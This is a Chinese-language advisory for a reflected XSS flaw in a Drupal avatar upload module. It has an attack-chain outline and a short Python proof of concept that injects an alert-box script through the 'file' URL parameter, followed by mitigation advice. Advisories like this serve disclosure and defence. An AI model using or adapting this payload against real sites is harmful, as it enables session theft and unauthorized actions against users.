CVE-2022-50957 Drupal avatar_uploader 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2022-50957

漏洞类型

反射型跨站脚本攻击 (XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Drupal avatar_uploader

漏洞概述

Drupal avatar_uploader模块7.x-1.0-beta8版本存在反射型跨站脚本（XSS）漏洞。该漏洞源于模块未能正确过滤用户通过file参数提交的数据。未经身份验证的远程攻击者可利用此漏洞，诱导受害者访问包含恶意JavaScript代码的特制链接。一旦受害者访问，恶意脚本将在其浏览器中执行，进而窃取会话凭证或执行未授权操作。

技术细节

该漏洞位于Drupal的avatar_uploader模块（7.x-1.0-beta8）的`avatar_uploader.pages.inc`文件处理逻辑中。其根本原因是应用程序未对用户通过URL请求传递的`file`参数进行有效的安全过滤和HTML实体编码。攻击者可以构造包含恶意JS脚本的URL参数值。当受害者被诱导访问该URL时，服务器端脚本会直接读取该参数并将其反射回HTTP响应页面中，导致浏览器解析并执行恶意代码。由于CVSS评分为6.1（中危），虽然需要用户交互（UI:R），但无需认证（PR:N）且攻击范围可波及上下文（S:C）。这使得攻击者能够绕过同源策略限制，窃取用户凭证或进行恶意操作。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用了Drupal CMS并安装了avatar_uploader模块7.x-1.0-beta8版本。

STEP 2

资源制作

攻击者构造一个包含恶意JavaScript代码的URL，将payload插入到未经过滤的'file'参数中。

STEP 3

传递

攻击者通过电子邮件、社交媒体或其他渠道将特制的恶意链接发送给目标受害者。

STEP 4

利用与执行

受害者点击链接，浏览器向服务器发送请求。服务器将恶意脚本反射回页面，受害者的浏览器解析并执行该脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2022-50957
# The vulnerable parameter is 'file' in avatar_uploader.pages.inc
# Usage: Access the URL below in a browser while logged in or with valid session context if needed.

import urllib.parse

# The base endpoint of the vulnerable module
base_url = "http://target-site.com/?q=avatar_uploader/js"

# Malicious payload to execute JavaScript
payload = "<script>alert('CVE-2022-50957_XSS');</script>"

# Construct the full URL with the vulnerable parameter
exploit_url = base_url + "&file=" + urllib.parse.quote(payload)

print(f"Exploit URL: {exploit_url}")
# If the application reflects the payload without encoding, an alert box will appear.

影响范围

Drupal avatar_uploader 7.x-1.0-beta8

防御指南

临时缓解措施

建议管理员立即检查并更新avatar_uploader模块。在无法立即更新时，应配置Web应用防火墙（WAF）以拦截针对file参数的常见XSS攻击模式，或临时限制对该模块接口的外部访问。